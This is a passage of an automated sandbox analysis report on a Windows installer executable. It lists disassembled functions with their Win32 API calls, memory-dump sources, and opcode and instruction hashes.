                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004980A4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$AttributesCloseFirstNext
                                                                                                                                                                                                                                  • String ID: isRS-$isRS-???.tmp
                                                                                                                                                                                                                                  • API String ID: 134685335-3422211394
                                                                                                                                                                                                                                  • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                                                                                                                                                  • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00457594 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                                                                                                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                                                                                                                                                  • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                                                                                                                                                  • API String ID: 2236967946-3182603685
                                                                                                                                                                                                                                  • Opcode ID: 2ca755f27c06970d2981b9b6af8c1c8ef9ed629d0542f582d4c6a8f6149c0e68
                                                                                                                                                                                                                                  • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ca755f27c06970d2981b9b6af8c1c8ef9ed629d0542f582d4c6a8f6149c0e68
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00455E0C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                  • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                                                                                                                                                  • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417CD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 00417D0F
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                                                                                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Placement$Iconic
                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                  • API String ID: 568898626-3772416878
                                                                                                                                                                                                                                  • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                                                                                                                                                  • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00464158 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4011626565-0
                                                                                                                                                                                                                                  • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                                                                                                                                                  • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00463CDC Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4011626565-0
                                                                                                                                                                                                                                  • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                                                                                                                                                  • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042E934 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1177325624-0
                                                                                                                                                                                                                                  • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                                                                                                                                                  • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0048393C Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 0048397A
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Show$IconicLong
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2754861897-0
                                                                                                                                                                                                                                  • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                                                                                                                                                  • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00462750 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3541575487-0
                                                                                                                                                                                                                                  • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                                                                                                                                  • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004241DC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 004241E4
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                                                                                                                                                                    • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                                                                                                                    • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,020A25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                                                                                                                                                                  • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ActiveFocusIconicShow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 649377781-0
                                                                                                                                                                                                                                  • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                                                                                                                                  • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417CCE Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 00417D0F
                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                                                                                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Placement$Iconic
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 568898626-0
                                                                                                                                                                                                                                  • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
